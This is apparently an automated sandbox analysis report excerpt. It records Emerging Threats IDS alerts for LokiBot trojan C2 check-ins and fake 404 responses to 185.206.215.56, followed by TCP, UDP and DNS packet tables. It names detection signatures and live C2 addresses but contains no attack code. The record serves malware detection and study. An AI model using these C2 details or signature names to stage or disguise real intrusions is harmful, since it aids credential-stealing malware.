01/05/21-19:07:14.047995 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49339 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:14.047995 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49339 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:14.047995 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49339 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:14.047995 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49339 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:14.227580 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49339 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:14.442937 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49340 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:14.442937 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49340 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:14.442937 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49340 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:14.442937 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49340 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:14.596332 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49340 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:14.806537 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49341 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:14.806537 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49341 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:14.806537 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49341 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:14.806537 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49341 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:14.974222 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49341 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:15.187360 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49342 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:15.187360 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49342 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:15.187360 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49342 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:15.187360 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49342 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:15.351310 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49342 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:15.557295 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49343 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:15.557295 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49343 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:15.557295 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49343 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:15.557295 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49343 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:15.731776 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49343 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:15.953688 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49344 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:15.953688 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49344 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:15.953688 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49344 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:15.953688 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49344 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:16.112186 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49344 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:16.321602 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49345 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:16.321602 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49345 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:16.321602 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49345 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:16.321602 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49345 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:16.490419 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49345 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:16.691140 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49346 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:16.691140 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49346 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:16.691140 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49346 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:16.691140 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49346 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:16.849536 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49346 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:17.070972 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49347 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.070972 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49347 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.070972 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49347 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.070972 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49347 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.241789 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49347 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:17.441718 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49348 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.441718 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49348 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.441718 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49348 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.441718 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49348 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.595691 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49348 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:17.814658 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49349 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.814658 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49349 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.814658 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49349 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.814658 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49349 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:17.974679 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49349 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:18.170246 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49350 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.170246 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49350 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.170246 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49350 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.170246 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49350 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.342973 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49350 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:18.546784 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49351 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.546784 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49351 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.546784 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49351 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.546784 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49351 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.726488 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49351 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:18.940629 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49352 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.940629 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49352 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.940629 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49352 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:18.940629 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49352 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.100818 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49352 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:19.314073 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49353 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.314073 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49353 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.314073 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49353 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.314073 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49353 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.472804 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49353 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:19.678882 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49354 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.678882 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49354 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.678882 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49354 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.678882 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49354 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:19.836989 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49354 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:20.060760 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49355 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.060760 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49355 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.060760 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49355 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.060760 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49355 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.222456 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49355 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:20.437125 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49356 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.437125 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49356 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.437125 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49356 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.437125 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49356 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.607773 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49356 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:20.817267 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49357 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.817267 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49357 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.817267 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49357 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.817267 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49357 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:20.984601 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49357 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:21.198560 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49358 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.198560 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49358 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.198560 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49358 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.198560 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49358 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.387078 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49358 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:21.572190 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49359 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.572190 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49359 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.572190 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49359 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.572190 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49359 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:21.741504 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49359 | 185.206.215.56 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 5, 2021 19:05:20.748044014 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232 |
Jan 5, 2021 19:05:20.788083076 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22 |
Jan 5, 2021 19:05:20.788252115 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232 |
Jan 5, 2021 19:05:20.805231094 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232 |
Jan 5, 2021 19:05:20.845263958 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22 |
Jan 5, 2021 19:05:20.849673986 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22 |
Jan 5, 2021 19:05:20.849720001 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22 |
Jan 5, 2021 19:05:20.849750996 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22 |
Jan 5, 2021 19:05:20.849864960 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232 |
Jan 5, 2021 19:05:20.865313053 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232 |
Jan 5, 2021 19:05:20.905706882 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22 |
Jan 5, 2021 19:05:20.905836105 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22 |
Jan 5, 2021 19:05:21.109913111 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232 |
Jan 5, 2021 19:05:22.187321901 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232 |
Jan 5, 2021 19:05:22.227421999 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22 |
Jan 5, 2021 19:05:22.369307995 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22 |
Jan 5, 2021 19:05:22.369350910 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22 |
Jan 5, 2021 19:05:22.369590998 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232 |
Jan 5, 2021 19:05:22.448667049 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.499711990 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.499824047 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.500040054 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.550899029 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.551645994 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.551749945 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.551772118 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.551798105 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.551816940 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.551848888 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.551855087 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.551868916 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.551882982 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.551893950 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.551913023 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.551933050 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.551975965 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.602938890 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.602984905 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603022099 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603055954 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603085041 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.603097916 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603123903 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603127003 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.603161097 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603183031 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.603185892 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603223085 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603244066 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.603249073 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603286028 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603319883 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603353024 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.603360891 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603387117 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603424072 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603449106 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603452921 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.603483915 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603509903 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.603511095 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.605087996 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.654531002 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654580116 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654618979 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654643059 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654666901 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.654680014 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654695988 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.654706001 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654753923 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654783010 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654818058 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654833078 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.654844046 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654879093 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.654881001 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654906034 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654942036 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654966116 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.654969931 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.655011892 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655029058 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.655042887 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655078888 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655106068 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655142069 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655143976 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.655164957 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655200958 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655225992 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655226946 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.655272007 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655276060 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
Jan 5, 2021 19:05:22.655301094 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655339956 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655359030 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655388117 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655412912 CET | 80 | 49167 | 83.172.144.37 | 192.168.2.22 |
Jan 5, 2021 19:05:22.655422926 CET | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 5, 2021 19:05:20.671252966 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 19:05:20.727847099 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 19:05:21.293368101 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 19:05:21.351258039 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 19:05:21.357091904 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 19:05:21.415157080 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Jan 5, 2021 19:05:22.378812075 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 5, 2021 19:05:22.447736979 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 5, 2021 19:05:20.671252966 CET | 192.168.2.22 | 8.8.8.8 | 0xad13 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jan 5, 2021 19:05:22.378812075 CET | 192.168.2.22 | 8.8.8.8 | 0x1175 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 5, 2021 19:05:20.727847099 CET | 8.8.8.8 | 192.168.2.22 | 0xad13 | No error (0) | 104.22.0.232 | A (IP address) | IN (0x0001) | ||
Jan 5, 2021 19:05:20.727847099 CET | 8.8.8.8 | 192.168.2.22 | 0xad13 | No error (0) | 172.67.8.238 | A (IP address) | IN (0x0001) | ||
Jan 5, 2021 19:05:20.727847099 CET | 8.8.8.8 | 192.168.2.22 | 0xad13 | No error (0) | 104.22.1.232 | A (IP address) | IN (0x0001) | ||
Jan 5, 2021 19:05:22.447736979 CET | 8.8.8.8 | 192.168.2.22 | 0x1175 | No error (0) | 83.172.144.37 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
